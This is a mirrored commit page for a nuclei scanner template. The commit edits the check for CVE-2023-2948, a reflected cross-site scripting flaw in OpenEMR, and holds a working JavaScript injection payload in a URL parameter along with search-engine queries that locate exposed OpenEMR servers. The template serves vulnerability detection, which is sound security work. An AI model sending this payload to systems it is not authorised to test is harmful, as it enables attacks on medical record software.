daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

minor update

patch-1
Dhiyaneshwaran 2024-04-23 19:14:37 +05:30 committed by GitHub
parent 120fd57968
commit 0eabf76da9
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 4 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
http/cves/2023/CVE-2023-2948.yaml
View File

@ -21,17 +21,19 @@ info:
product: openemr
fofa-query: app="OpenEMR"
shodan-query: http.favicon.hash:1971268439
verified: true
max-request: 1
tags: cve,cve2023,xss,openemr,open-emr
http:
- method: GET
path:
- "{{BaseURL}}/library/custom_template/share_template.php?list_id=1}});}}alert(1);function%20x(){if(1){a=({a:{a:1"
- "{{BaseURL}}/library/custom_template/share_template.php?list_id=1}});}}alert(document.domain);function%20x(){if(1){a=({a:{a:1"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains_all(body, "list_id: 1}});}}alert(1);", "select at least one Provider", "Save</span>")'
- 'contains_all(body, "list_id: 1}});}}alert(document.domain);", "select at least one Provider", "Save</span>")'
condition: and